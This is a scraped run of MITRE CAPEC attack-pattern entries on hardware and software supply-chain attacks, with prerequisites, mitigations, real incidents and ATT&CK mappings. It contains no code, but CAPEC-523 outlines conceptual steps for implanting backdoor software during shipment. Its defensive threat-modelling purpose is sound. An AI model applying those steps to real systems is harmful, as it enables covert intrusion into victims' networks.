Substitute Components in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary substitutes the malicious component for the targeted component. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

Prerequisites

Physical access to the system after it has left the manufacturer but before it is deployed at the victim location.

Skills Required

[Level: High]

Advanced knowledge of the design of the system.

[Level: High]

Hardware creation and manufacture of replacement components.

Mitigations

Ensure that all contractors and sub-suppliers use trusted means of shipping (e.g., bonded/cleared/vetted and insured couriers) to ensure that components, once purchased, are not subject to compromise during their delivery.

Prevent or detect tampering with critical hardware or firmware components while in transit through use of state-of-the-art anti-tamper devices.

Use tamper-resistant and tamper-evident packaging when shipping critical components (e.g., plastic coating for circuit boards, tamper tape, paint, sensors, and/or seals for cases and containers) and inspect received system components for evidence of tampering.

Example Instances

During shipment the adversary is able to intercept a system that has been purchased by the victim, and replaces a math processor card that functions just like the original, but contains advanced malicious capability. Once deployed, the system functions as normal, but allows for the adversary to remotely communicate with the system and use it as a conduit for additional compromise within the victim's environment.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Typical_Likelihood_of_Exploit
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Mitigations
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Execution_Flow, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-534: Malicious Hardware Update

Attack Pattern ID: 534

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	440	Hardware Integrity Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	531	Hardware Component Substitution
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	677	Server Motherboard Compromise

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Skills Required

[Level: High]

Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.

Example Instances

An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim's network.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-711] Omer Shwartz, Amir Cohen, Asaf Shabtai and Yossi Oren. "Shattered Trust: When Replacement Smartphone Components Attack". 11th USENIX Workshop on Offensive Technologies. USENIX. 2017. <https://www.usenix.org/system/files/conference/woot17/woot17-paper-shwartz.pdf>. URL validated: 2022-02-16.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Attack_Prerequisites, Description Summary, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated References

CAPEC-443: Malicious Logic Inserted Into Product by Authorized Developer

Attack Pattern ID: 443

Abstraction: Detailed

View customized information:

Description

An adversary uses their privileged position within an authorized development organization to inject malicious logic into a codebase or product.

Extended Description

Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In further cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

Access to the product during the initial or continuous development.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Mitigations

Assess software and hardware during development and prior to deployment to ensure that it functions as intended and without any malicious functionality. This includes both initial development, as well as updates propagated to the product after deployment.

Example Instances

In January 2022 the author of popular JavaScript packages "Faker" and "colors", used for generating mock data and including colored text within NodeJS consoles respectively, introduced malicious code that resulted in a Denial of Service (DoS) via an infinite loop. When applications that leveraged these packages updated to the malicious version, their applications executed the infinite loop and output gibberish ASCI characters endlessly. This resulted in the application being unusable until a stable version of the package was obtained. [REF-705]

During initial development, an authorized hardware developer implants a malicious microcontroller within an Internet of Things (IOT) device and programs the microcontroller to communicate with the vulnerable device. Each time the device initializes, the malicious microcontroller's code is executed, which ultimately provides the adversary with backdoor access to the vulnerable device. This can further allow the adversary to sniff network traffic, exfiltrate date, execute unauthorized commands, and/or pivot to other vulnerable devices.

Related Weaknesses

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.002	Supply Chain Compromise: Compromise Software Supply Chain
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

[REF-704] Ax Sharma. "Dev corrupts NPM libs 'colors' and 'faker' breaking thousands of apps". BleepingComputer. 2022-01-09. <https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/>. URL validated: 2022-02-16.

[REF-705] Alberto Pellitteri. "Malicious modifications to open source projects affecting thousands". SysDig. 2022-01-12. <https://sysdig.com/blog/malicious-modifications-detection-sysdig/>. URL validated: 2022-02-16.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Example_Instances, Mitigations, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated @Name, Description, Example_Instances, Extended_Description, Mitigations, Prerequisites, Related_Attack_Patterns, Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2022-09-29 (Version 3.8)	Malicious Logic Inserted Into Product Software by Authorized Developer

CAPEC-441: Malicious Logic Insertion

Attack Pattern ID: 441

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	442	Infected Software
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	452	Infected Hardware
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	456	Infected Memory

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources

Prerequisites

Access to the component currently deployed at a victim location.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Malicious Logic Inserted Into to Product

CAPEC-445: Malicious Logic Insertion into Product Software via Configuration Management Manipulation

Attack Pattern ID: 445

Abstraction: Detailed

View customized information:

Description

Extended Description

Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

Access to the configuration management system during deployment or currently deployed at a victim location. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Mitigations

Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.

Leverage anti-virus products to detect and quarantine software with known virus.

Example Instances

In 2016, the policy-based configuration management system Chef was shown to be vulnerable to remote code execution attacks based on its Chef Manage add-on improperly deserializing user-driven cookie data. This allowed unauthenticated users the ability to craft cookie data that executed arbitrary code with the web server's privileges. [REF-706]

Related Weaknesses

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.001	Supply Chain Compromise: Compromise Software Dependencies and Development Tools

References

[REF-706] "Chef Manage deserializes cookie data insecurely". Carnegie Mellon University. 2016-05-17. <https://www.kb.cert.org/vuls/id/586503>. URL validated: 2022-02-16.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Extended_Description, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description, Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-446: Malicious Logic Insertion into Product via Inclusion of Third-Party Component

Attack Pattern ID: 446

Abstraction: Detailed

View customized information:

Description

Extended Description

The result is a window of opportunity for exploiting the product until the insecure component is discovered. This supply chain threat can result in the installation of malicious software or hardware that introduces widespread security vulnerabilities within an organization. Additionally, because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing Commercial off the Shelf (COTS) or Open Source Software (OSS) software that comes pre-packaged with the components required for it to operate. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

Access to the product during the initial or continuous development. This access is often obtained via insider access to include the third-party component after deployment.

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands

Mitigations

Don't assume popular third-party components are free from malware or vulnerabilities. For software, assess for malicious functionality via update/commit reviews or automated static/dynamic analysis prior to including the component within the application and deploying in a production environment.

Example Instances

From mid-2014 to early 2015, Lenovo computers were shipped with the Superfish Visual Search software that ultimately functioned as adware on the system. The Visual Search installation included a self-signed root HTTPS certificate that was able to intercept encrypted traffic for any site visited by the user. Of more concern was the fact that the certificate's corresponding private key was the same for every Lenovo machine. Once the private key was discovered [REF-709], an adversary could then conduct an Adversary-in-the-Middle (AitM) attack that would go undetected by machines that had this certificate installed on it. Adversaries could then masquerade as legitimate entities such as financial institutions, popular corporations, or other secure destinations on the Internet. [REF-708]

Related Weaknesses

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195	Supply Chain Compromise

References

[REF-707] Thomas Brewster. "How Lenovo's Superfish 'Malware' Works And What You Can Do To Kill It". Forbes. 2015-02-19. <https://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/?sh=991ab8c38776>. URL validated: 2022-02-16.

[REF-708] Dan Goodin. "Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections". Ars Technica. 2015-02-19. <https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections/>. URL validated: 2022-02-16.

[REF-709] Rob Graham. "Extracting the SuperFish certificate". Errata Security. 2015-02-19. <https://blog.erratasec.com/2015/02/extracting-superfish-certificate.html#.VOX5Ky57RqE>. URL validated: 2022-02-16.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Example_Instances, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated @Name, Description, Example_Instances, Extended_Description, Mitigations, Prerequisites, References, Related_Attack_Patterns, Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2022-09-29 (Version 3.8)	Malicious Logic Insertion into Product Software via Inclusion of 3rd Party Component Dependency

CAPEC-533: Malicious Manual Software Update

Attack Pattern ID: 533

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	186	Malicious Software Update

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain, Social Engineering
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Prerequisites

Advanced knowledge about the download and update installation processes.

Advanced knowledge about the deployed system and its various software subcomponents and processes.

Skills Required

[Level: High]

Able to develop malicious code that can be used on the victim's system while maintaining normal functionality.

Mitigations

Only accept software updates from an official source.

Example Instances

An email campaign was initiated, targetting victims of a ransomware attack. The email claimed to be a patch to address the ransomware attack, but was instead an attachment that caused the Cobalt Strike tools to be installed, which enabled further attacks.

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-710] Sean Endicott. "Fake Microsoft update used in malicious email attack campaign". Microsoft News. 2021-07. <https://www.msn.com/en-us/news/technology/fake-microsoft-update-used-in-malicious-email-attack-campaign/ar-AALTcVs>. URL validated: 2022-02-16.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Example_Instances, Mitigations, References
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Malicious Software Update

CAPEC-479: Malicious Root Certificate

Attack Pattern ID: 479

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	473	Signature Spoof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the ability to create a new root certificate.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1553.004	Subvert Trust Controls:Install Root Certificate

Content History

Submissions
Submission Date	Submitter	Organization
2018-04-26 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-04-26 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings

CAPEC-185: Malicious Software Download

Attack Pattern ID: 185

Abstraction: Standard

View customized information:

Description

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	184	Software Integrity Attack
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	159	Redirect Access to Libraries
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	662	Adversary in the Browser (AiTB)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-523: Malicious Software Implanted

Attack Pattern ID: 523

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	439	Manipulation During Distribution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Distribution

Execution Flow

Explore

Determine Entry Point: The adversary must first identify a system that they wish to target and search for an entry point they can use to install the malicious software. This could be a system which they have prior knowledge of, giving them insight into the software and environment.
Techniques
Use a JTAGulator to identify exposed JTAG and UART interfaces in smaller embedded systems.
Identify exposed USB connectors that could be used to load software.
Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.
Techniques
Procure a system and observe the steps it takes in the shipment process.
Identify possible warehouses that systems are stored after manufacturing.

Experiment

Test Malicious Software: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

Techniques
Design malicious software that will give an adversary a backdoor into the system once it is deployed to the victim.
Obtain already designed malicious software that just need to be placed into the system.

Exploit

Implant Software in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary implants the malicious software into the system. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

Prerequisites

Physical access to the system after it has left the manufacturer but before it is deployed at the victim location.

Skills Required

[Level: High]

Advanced knowledge of the design of the system and it's operating system components and subcomponents.

[Level: High]

Malicious software creation.

Mitigations

Deploy strong code integrity policies to allow only authorized apps to run.

Use endpoint detection and response solutions that can automaticalkly detect and remediate suspicious activities.

Require SSL for update channels and implement certificate transparency based verification.

Sign everything, including configuration files, XML files and packages.

Develop an incident response process, disclose supply chain incidents and notify customers with accurate and timely information.

Example Instances

An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1195.002	Supply Chain Compromise: Compromise Software Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow, Mitigations, References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-186: Malicious Software Update

Attack Pattern ID: 186

Abstraction: Standard

View customized information:

Description

An adversary uses deceptive methods to cause a user or an automated process to download and install dangerous code believed to be a valid update that originates from an adversary controlled source.

Extended Description

Although there are several variations to this strategy of attack, the attack methods are united in that all rely on the ability of an adversary to position and disguise malicious content such that it masquerades as a legitimate software update which is then processed by a program, undermining application integrity.

As such the attack employs 'spoofing' techniques augmented by psychological or technological mechanisms to disguise the update and/or its source. Virtually all software requires frequent updates or patches, giving the adversary immense latitude when structuring the attack, as well as many targets of opportunity. Automated attacks involving malicious software updates require little to no user-directed activity and are therefore advantageous because they avoid the complex preliminary setup stages of manual attacks, which must effectively 'hook' users while avoiding countermeasures such as spam filters or web security filters.

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	184	Software Integrity Attack
